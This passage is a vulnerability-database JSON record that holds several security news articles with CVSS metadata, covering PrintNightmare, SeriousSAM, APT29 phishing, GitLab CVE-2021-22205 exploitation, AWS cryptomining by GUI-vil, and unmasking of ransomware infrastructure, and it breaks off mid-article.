"cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-08T04:35:00", "type": "thn", "title": "Microsoft's Emergency Patch Fails to Fully Fix PrintNightmare RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-09T09:52:49", "id": "THN:CAFA6C5C5A34365636215CFD7679FD50", "href": "https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:23", "description": "[](<https://thehackernews.com/images/-RJ_0BYkTxHY/YN7HyUD-_KI/AAAAAAAA4SA/dbXcZli9DPwTnJvla5sgZ3hDzIqO8zLRgCLcBGAsYHQ/s0/windows-print-spooler-vulnerability.jpg>)\n\nMicrosoft on Thursday officially confirmed that the \"**PrintNightmare**\" remote code execution (RCE) vulnerability affecting Windows Print Spooler is different from the issue the company addressed as part of its Patch Tuesday update released earlier this month, while warning that it has detected exploitation attempts targeting the flaw.\n\nThe company is tracking the security weakness under the identifier [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), and has assigned it a severity rating of 8.8 on the CVSS scoring system. All versions of Windows contain the vulnerable code and are susceptible to exploitation.\n\n\"A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\" Microsoft said in its advisory. \"An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\n\"An attack must involve an authenticated user calling RpcAddPrinterDriverEx(),\" the Redmond-based firm added. When reached by The Hacker News, the company said it had nothing to share beyond the advisory.\n\nThe acknowledgment comes after researchers from Hong Kong-based cybersecurity company Sangfor [published](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) a technical deep-dive of a Print Spooler RCE flaw to GitHub, along with a fully working PoC code, before it was taken down just hours after it went up.\n\n[](<https://thehackernews.com/images/-Zl5E2TyZRFQ/YN7Ej6s8x8I/AAAAAAAA4R4/FEYZ4JpYdakscU9e8eXMl9VEI0Hl1P_SwCLcBGAsYHQ/s0/ms.jpg>)\n\nThe disclosures also set off speculation and debate about whether the June patch does or does not protect against the RCE vulnerability, with the CERT Coordination Center [noting](<https://kb.cert.org/vuls/id/383432>) that \"while Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have Point and Print configured with the NoWarningNoElevationOnInstall option configured.\"\n\nCVE-2021-1675, originally classified as an elevation of privilege vulnerability and later revised to RCE, was remediated by Microsoft on June 8, 2021.\n\nThe company, in its advisory, noted that PrintNightmare is distinct from CVE-2021-1675 for reasons that the latter resolves a separate vulnerability in RpcAddPrinterDriverEx() and that the attack vector is different.\n\nAs workarounds, Microsoft is recommending users to disable the Print Spooler service or turn off inbound remote printing through Group Policy. To reduce the attack surface and as an alternative to completely disabling printing, the company is also advising to check membership and nested group membership, and reduce membership as much as possible, or completely empty the groups where possible.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T05:36:00", "type": "thn", "title": "Microsoft Warns of Critical \"PrintNightmare\" Flaw Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-03T07:11:54", "id": "THN:9CE630030E0F3E3041E633E498244C8D", "href": "https://thehackernews.com/2021/07/microsoft-warns-of-critical.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:18", "description": "[](<https://thehackernews.com/images/-2Vh6AhRwNKs/YP6aCnEii6I/AAAAAAAABK0/Sm1Yj72UTWQ0Kh_48L0sq_91GZSVbDq8wCLcBGAsYHQ/s0/SeriousSAM-Vulnerability.jpg>)\n\nMicrosoft Windows 10 and Windows 11 users are at risk of a new unpatched vulnerability that was recently disclosed publicly.\n\nAs we reported last week, the vulnerability \u2014 [SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) \u2014 allows attackers with low-level permissions to access Windows system files to perform a Pass-the-Hash (and potentially Silver Ticket) attack. \n\nAttackers can exploit this vulnerability to obtain hashed passwords stored in the Security Account Manager (SAM) and Registry, and ultimately run arbitrary code with SYSTEM privileges.\n\nSeriousSAM vulnerability, tracked as **CVE-2021-36934**, exists in the default configuration of Windows 10 and Windows 11, specifically due to a setting that allows 'read' permissions to the built-in user's group that contains all local users.\n\nAs a result, built-in local users have access to read the SAM files and the Registry, where they can also view the hashes. Once the attacker has 'User' access, they can use a tool such as Mimikatz to gain access to the Registry or SAM, steal the hashes and convert them to passwords. Invading Domain users that way will give attackers elevated privileges on the network.\n\nBecause there is no official patch available yet from Microsoft, the best way to protect your environment from SeriousSAM vulnerability is to implement hardening measures.\n\n## Mitigating SeriousSAM\n\nAccording to Dvir Goren, CTO at CalCom, there are three optional hardening measures:\n\n 1. **Delete all users from the built-in users' group** \u2014 this is a good place to start from, but won't protect you if Administrator credentials are stolen.\n 2. **Restrict SAM files and Registry permissions** \u2014 allow access only for Administrators. This will, again, only solve part of the problem, as if an attacker steals Admin credentials, you will still be vulnerable to this vulnerability.\n 3. **Don't allow the storage of passwords and credentials for network authentication **\u2014 this rule is also recommended in the [CIS benchmarks](<https://www.calcomsoftware.com/cis-hardening-and-configuration-security-guide/>). By implementing this rule, there will be no hash stored in the SAM or registry, thereby mitigating this vulnerability completely.\n\nWhen using GPOs for implementation, make sure the following UI Path is Enabled:\n\n> Computer Configuration\\Policies\\Windows Settings\\Security Settings\\Local Policies\\Security Options\\Network access: Do not allow storage of passwords and credentials for network authentication\n\n_Despite the fact that the last recommendation offers a good solution for SeriousSAM, it may negatively impact your production if not properly tested before it is pushed. When this setting is enabled, applications that use scheduled tasks and need to store users' hashes locally will fail._\n\n## Mitigating SeriousSAM without risking causing damage to production\n\nThe following are Dvir's recommendations for mitigating without causing downtime:\n\n 1. Set up a test environment that will simulate your production environment. Simulate all possible dependencies of your network as accurately as you can.\n 2. Analyze the impact of this rule on your test environment. In this way, if you have applications that rely on hashes that are stored locally, you'll know in advance and prevent production downtime.\n 3. Push the policy where possible. Make sure new machines are also hardened and that the configuration doesn't drift over time.\n\nThese three tasks are complex and require a lot of resources and in-house expertise. Therefore, Dvir's final recommendation is to [automate the entire hardening process](<https://www.calcomsoftware.com/server-hardening-suite/?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>) to save the need to perform stages 1, 2 and 3. \n\nHere is what you will gain from a [Hardening Automation Tool](<https://www.calcomsoftware.com/best-hardening-tools/?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>):\n\n * Automatically generate the most accurate possible impact analysis report \u2013 hardening automation tools 'learns' your production dependencies and report to you the potential impact of each policy rule. \n * Automatically enforce your policy on your entire production from a single point of control \u2013 using these tools, you won't need to do manual work, such as using GPOs. You can control and be certain all your machines are hardened.\n * Maintain your compliance posture and monitor your machines in real-time \u2013 hardening automation tools will monitor your compliance posture, alert and remediate any unauthorized changes in configurations, therefore preventing configuration drifts. \n\n[Hardening automation tools](<https://www.calcomsoftware.com?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>) will learn the dependencies directly from your network and automatically generate an accurate impact analysis report. A hardening automation tool will also help you orchestrate the implementation and monitoring process.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-26T11:21:00", "type": "thn", "title": "How to Mitigate Microsoft Windows 10, 11 SeriousSAM Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-26T11:21:00", "id": "THN:777A53E3DACA2E9D76D60AB889CFD10F", "href": "https://thehackernews.com/2021/07/how-to-mitigate-microsoft-windows-10-11.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:35", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEg1htgV20xnZFGHy8xys5a3a8RDOEZB9kzl6RyaRUmt6zE03r6yB_FnqpjR1iu5tj48oBafZq6mQ2iT7IbFULnsgOYBOXm01lnZjwIF1anuI3nLsK7lL87KbyL1UWUYNDmzgkLRurzHi4oYNIEIxTxXzkVXRR89_meOuJ0FAHhdAvY6naUEmPbN4lFS>)\n\nThe Russia-linked threat actor known as APT29 targeted European diplomatic missions and Ministries of Foreign Affairs as part of a series of spear-phishing campaigns mounted in October and November 2021.\n\nAccording to ESET's [T3 2021 Threat Report](<https://www.welivesecurity.com/2022/02/09/eset-threat-report-t32021/>) shared with The Hacker News, the intrusions paved the way for the deployment of Cobalt Strike Beacon on compromised systems, followed by leveraging the foothold to drop additional malware for gathering information about the hosts and other machines in the same network.\n\nAlso tracked under the names The Dukes, Cozy Bear, and Nobelium, the advanced persistent threat group is an infamous cyber-espionage group that has been active for more than a decade, with its attacks targeting Europe and the U.S., before it gained widespread attention for the [supply\u2010chain compromise](<https://thehackernews.com/2022/02/new-malware-used-by-solarwinds.html>) of SolarWinds, leading to further infections in several downstream entities, including U.S. government agencies in 2020.\n\nThe spear-phishing attacks commenced with a COVID-19-themed phishing email impersonating the Iranian Ministry of Foreign Affairs and containing an HTML attachment that, when opened, prompts the recipients to open or save what appears to be an ISO disk image file (\"Covid.iso\").\n\nShould the victim opt to open or download the file, \"a small piece of JavaScript decodes the ISO file, which is embedded directly in the HTML attachment.\" The disk image file, in turn, includes an HTML application that's executed using [mshta.exe](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/>) to run a piece of PowerShell code that ultimately loads the Cobalt Strike Beacon onto the infected system.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEglwgfTakz5tfhTSwDOMYonZpvaHlCIHm8s2Siv7LsnSe0W0dFfpgbBClJWSt9tMLfPmBA10CeMIEH53LnLbqlrg4zv9mKFmIl7GHJ76TVTXmsXgB8kdL4wAXSnI_z-0ph0Mzn4DlYyAAJOJF4XIwYxPtw_NiqMAtsbd7VscqKWz0U20rPFTUjqwiDP>)\n\nESET also characterized APT29's reliance on HTML and ISO disk images (or VHDX files) as an evasion technique orchestrated specifically to evade Mark of the Web ([MOTW](<https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/ms537628\\(v=vs.85\\)>)) protections, a security feature introduced by Microsoft to determine the origin of a file.\n\n\"An ISO disk image doesn't propagate the so-called Mark of the Web to the files inside the disk image,\" the researchers said. \"As such, and even if the ISO were downloaded from the internet, no warning would be displayed to the victim when the HTA is opened.\"\n\nUpon successfully gaining initial access, the threat actor delivered a variety of off-the-shelf tools to query the target's Active Directory ([AdFind](<https://www.joeware.net/freetools/tools/adfind/>)), execute commands on a remote machine using SMB protocol ([Sharp-SMBExec](<https://github.com/checkymander/Sharp-SMBExec>)), carry out reconnaissance ([SharpView](<https://github.com/tevora-threat/SharpView>)), and even an exploit for a Windows privilege escalation flaw ([CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>)) to carry out follow-on attacks.\n\n\"Recent months have shown that The Dukes are a serious threat to western organizations, especially in the diplomatic sector,\" the researchers noted. \"They are very persistent, have good operational security, and they know how to create convincing phishing messages.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T10:46:00", "type": "thn", "title": "Russian APT Hackers Used COVID-19 Lures to Target European Diplomats", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-02-10T03:04:57", "id": "THN:894809E1ADF0684644DCCDD97F76BC73", "href": "https://thehackernews.com/2022/02/russian-apt-hackers-used-covid-19-lures.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T06:21:32", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh3CHScRqcKS7PwL-oce_WjeNwa0Sl2eIq-gNhlPHJoG-hYRAtkqL2jrNAmLQagkSVgt-aR1wRRcwVGNqN6yn9b1oS5E0VchRELzhSykTZ5r-QTVSDjBtAawUdPlSmzqr2bR_-A7tb-hSUgePACaFcbsccKo-l8n8DoR_RefDhfXBGkXNIFLrrGRuPg/s728-e365/aws.jpg>)\n\nA financially motivated threat actor of Indonesian origin has been observed leveraging Amazon Web Services (AWS) Elastic Compute Cloud (EC2) instances to carry out illicit crypto mining operations.\n\nCloud security company's Permiso P0 Labs, which first detected the group in November 2021, has assigned it the moniker **GUI-vil** (pronounced Goo-ee-vil).\n\n\"The group displays a preference for Graphical User Interface (GUI) tools, specifically S3 Browser (version 9.5.5) for their initial operations,\" the company said in a [report](<https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/>) shared with The Hacker News. \"Upon gaining AWS Console access, they conduct their operations directly through the web browser.\"\n\nAttack chains mounted by GUI-vil entail obtaining initial access by weaponizing AWS keys in publicly exposed source code repositories on GitHub or scanning for GitLab instances that are vulnerable to remote code execution flaws (e.g., [CVE-2021-22205](<https://nvd.nist.gov/vuln/detail/CVE-2021-22205>)).\n\nA successful ingress is followed by privilege escalation and an internal reconnaissance to review all available S3 buckets and determine the services that are accessible via the AWS web console.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi-wqMQB2jvy2co5rrJP7SzsydnIdZ-fEf7WfDc9OnfEdr8kt3t2-aL2mS5LCRUBYnjsZa8OKAEF8goHiPS_8vXtytGZV6PfACz0D51iShYjUffqHFsNDX-P-9l3wGhuwAUEQ7R_Cmj6fleeyeTJNdh-xn4fQ2S782773uzU3YYf9ag35Neq1qV9-ex/s728-e365/crypto.jpg>)\n\nA notable aspect of the threat actor's modus operandi is its attempt to blend in and persist within the victim environment by creating new users that conform to the same naming convention and ultimately meet its objectives.\n\n\"GUI-vil will also create access keys for the new identities they are creating so they can continue usage of [S3 Browser](<https://s3browser.com/>) with these new users,\" P0 Labs researchers Ian Ahl and Daniel Bohannon explained.\n\nAlternatively, the group has also been spotted [creating login profiles](<https://s3browser.com/iam-aws-identity-and-access-management.aspx>) for existing users that do not have them so as to enable access to the AWS console without raising red flags.\n\nGUI-vil's links to Indonesia stem from the fact that the source IP addresses associated with the activities are linked to two Autonomous System Numbers (ASNs) located in the Southeast Asian country.\n\n\"The group's primary mission, financially driven, is to create EC2 instances to facilitate their crypto mining activities,\" the researchers said. \"In many cases the profits they make from crypto mining are just a sliver of the expense the victim organizations have to pay for running the EC2 instances.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-05-22T16:05:00", "type": "thn", "title": "Indonesian Cybercriminals Exploit AWS for Profitable Crypto Mining Operations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-05-23T04:44:35", "id": "THN:E419B1DF43D0213BA108DD837F6E33F7", "href": "https://thehackernews.com/2023/05/indonesian-cybercriminals-exploit-aws.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:08", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgly3ynZqRUgIk8eaQI3ACZ6rpkFw0RZ40CXxAvusm_imwL1dgvJ3jiKVwoxFqYRtOL12IrCe1580PpFo8dxP3nXUpVMg2PSt75raRc6Aliqp3juIRilqztTEQSSdBnsY7tmAS_RFHr847lXP9JcajCCgGXlhhR-J5PNTyorMZ3a-xlC5UcNBF_EfsQ>)\n\nA now-patched critical remote code execution (RCE) vulnerability in GitLab's web interface has been detected as actively exploited in the wild, cybersecurity researchers warn, rendering a large number of internet-facing GitLab instances susceptible to attacks.\n\nTracked as [CVE-2021-22205](<https://nvd.nist.gov/vuln/detail/CVE-2021-22205>), the issue relates to an improper validation of user-provided images that results in arbitrary code execution. The vulnerability, which affects all versions starting from 11.9, has since been [addressed](<https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/>) by GitLab on April 14, 2021 in versions 13.8.8, 13.9.6, and 13.10.3.\n\nIn one of the real-world attacks [detailed](<https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/>) by HN Security last month, two user accounts with admin privileges were registered on a publicly-accessible GitLab server belonging to an unnamed customer by exploiting the aforementioned flaw to upload a malicious payload \"image,\" leading to remote execution of commands that granted the rogue accounts elevated permissions.\n\nAttacks exploiting the vulnerability are said to have begun as early as June this year, coinciding with the public availability of proof-of-concept (PoC) code required to breach the servers.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjoqyT_hmLyoAmnF0JFLIJcRvzhRCsukVCw_PR5xwU_bCu5SZB-qAZs4tKPZ2IDNDfwZuyxq1BE9xT2SYqUw4-j8wgJ_n8-Ere-I4mkKgad0pdD1DRpKu1E6Hsh3I33sJn1MxbAYGXRJASGruMCvxYRxwbaVyEQb6i7lgidzZ8ODkC-YyQOk8dk_OAv>)\n\nAlthough the flaw was initially deemed to be a case of authenticated RCE and assigned a CVSS score of 9.9, the severity rating was revised to 10.0 on September 21, 2021 owing to the fact that it can be triggered by unauthenticated threat actors as well.\n\n\"Despite the tiny move in CVSS score, a change from authenticated to unauthenticated has big implications for defenders,\" cybersecurity firm Rapid7 [said](<https://www.rapid7.com/blog/post/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/>) in an alert published Monday.\n\nTelemetry data gathered by the Boston-based company show that of the 60,000 internet-facing GitLab installations, only 21% of the instances are fully patched against the issue, with another 50% still vulnerable to RCE attacks regardless of the fact that the patches have been up for grabs for more than six months.\n\nIn the light of the unauthenticated nature of this vulnerability, exploitation activity is expected to increase, making it critical that GitLab users update to the latest version as soon as possible. \"In addition, ideally, GitLab should not be an internet facing service,\" the researchers said. \"If you need to access your GitLab from the internet, consider placing it behind a VPN.\"\n\nAdditional technical analysis related to the vulnerability can be accessed [here](<https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis>).\n\n**_Update:_** Threat actors are now actively exploiting the security flaw to co-opt unpatched GitLab servers into a botnet and launch distributed denial of service (DDoS) attacks, with some in excess of 1 terabits per second (Tbps), [according](<https://twitter.com/menscher/status/1456057918562861059>) to Google security reliability engineer Damian Menscher.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-02T10:03:00", "type": "thn", "title": "Alert! Hackers Exploiting GitLab Unauthenticated RCE Flaw in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2021-11-05T05:40:52", "id": "THN:AF03AC0B7E2ACC4689E02BDC9E87A844", "href": "https://thehackernews.com/2021/11/alert-hackers-exploiting-gitlab.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T07:58:10", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhW8mCPe27LdzHLP4ngj6tlt2Pg8kCf_fM8vePiD96oqVL7MUOW8zxZlXFGU1HvblavK2Xdcm0tf2j7r5qbvTV9iW1N9M95vbWmuFsGUq0MkEeY7rnkpeop76NG41Eys_CeiCVl0xS8l4E21-RosfCrVOTGYR8jNw1F5Q2v-OjF2MeqKfBbPn6bDseq/s728-e100/ransomware.jpg>)\n\nCybersecurity researchers have detailed the various measures ransomware actors have taken to obscure their true identity online as well as the hosting location of their web server infrastructure.\n\n\"Most ransomware operators use hosting providers outside their country of origin (such as Sweden, Germany, and Singapore) to host their ransomware operations sites,\" Cisco Talos researcher Paul Eubanks [said](<https://blog.talosintelligence.com/2022/06/de-anonymizing-ransomware-domains-on.html>). \"They use VPS hop-points as a proxy to hide their true location when they connect to their ransomware web infrastructure for remote administration tasks.\"\n\nAlso prominent are the use of the TOR network and DNS proxy registration services to provide an added layer of anonymity for their illegal operations.\n\nBut by taking advantage of the threat actors' operational security missteps and other techniques, the cybersecurity firm disclosed last week that it was able to identify TOR hidden services hosted on public IP addresses, some of which are previously unknown infrastructure associated with [DarkAngels](<https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/>), [Snatch](<https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch>), [Quantum](<https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware>), and [Nokoyawa](<https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa>) ransomware groups.\n\nWhile ransomware groups are known to rely on the dark web to conceal their illicit activities ranging from leaking stolen data to negotiating payments with victims, Talos disclosed that it was able to identify \"public IP addresses hosting the same threat actor infrastructure as those on the dark web.\"\n\n\"The methods we used to identify the public internet IPs involved matching threat actors' [self-signed] [TLS certificate](<https://www.digicert.com/tls-ssl/tls-ssl-certificates>) serial numbers and page elements with those indexed on the public internet,\" Eubanks said.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjaV9wVlzzeADW3plTap4jOh9fqaG1M5Q8q7q-pX6vbN6EAWqHqnEEvq-nA0yW2N64kchUyacQRbSQXnYk0i2qcd2Lxjiu4alpeum5cu6QCPMBvjt90TSKl-7opy4d0YCn8MX_tPYh7B04Vidh2gZfgYJXxKGevp9NbNa8lZg-DQGZXl7xjDrvwfK89/s728-e100/cert.jpg>)\n\nBesides TLS certificate matching, a second method employed to uncover the adversaries' clear web infrastructures entailed checking the favicons associated with the darknet websites against the public internet using web crawlers like Shodan.\n\nIn the case of [Nokoyawa](<https://www.fortinet.com/blog/threat-research/nokoyawa-variant-catching-up>), a new Windows ransomware strain that appeared earlier this year and shares substantial code similarities with Karma, the site hosted on the TOR hidden service was found to harbor a directory traversal flaw that enabled the researchers to access the \"[/var/log/auth.log](<https://help.ubuntu.com/community/LinuxLogFiles>)\" file used to capture user logins.\n\nThe findings demonstrate that not only are the criminal actors' leak sites accessible for any user on the internet, other infrastructure components, including identifying server data, were left exposed, effectively making it possible to obtain the login locations used to administer the ransomware servers.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiKBfxqmczj3qrieqIFbqxh8pEIBTtSz9_BdFyfDEKmGEjCUPpH7QhuZsHt6jxBWgKWU2wcnFlthPIVmExegrtxg0bzvUln74smXx6Krggvf6_bQ9tr_o1NRTxCcjmsINrMdRyZpvXHdS8zZSeFCw8zi_qx2puc2SGz4zIL9dtTRKkdNSYZMGX3KE3p/s728-e100/keys.jpg>)\n\nFurther analysis of the successful root user logins showed that they originated from two IP addresses 5.230.29[.]12 and 176.119.0[.]195, the former of which belongs to GHOSTnet GmbH, a hosting provider that offers Virtual Private Server (VPS) services.\n\n\"176.119.0[.]195 however belongs to AS58271 which is listed under the name Tyatkova Oksana Valerievna,\" Eubanks noted. \"It's possible the operator forgot to use the German-based VPS for obfuscation and logged into a session with this web server directly from their true location at 176.119.0[.]195.\"\n\n### LockBit 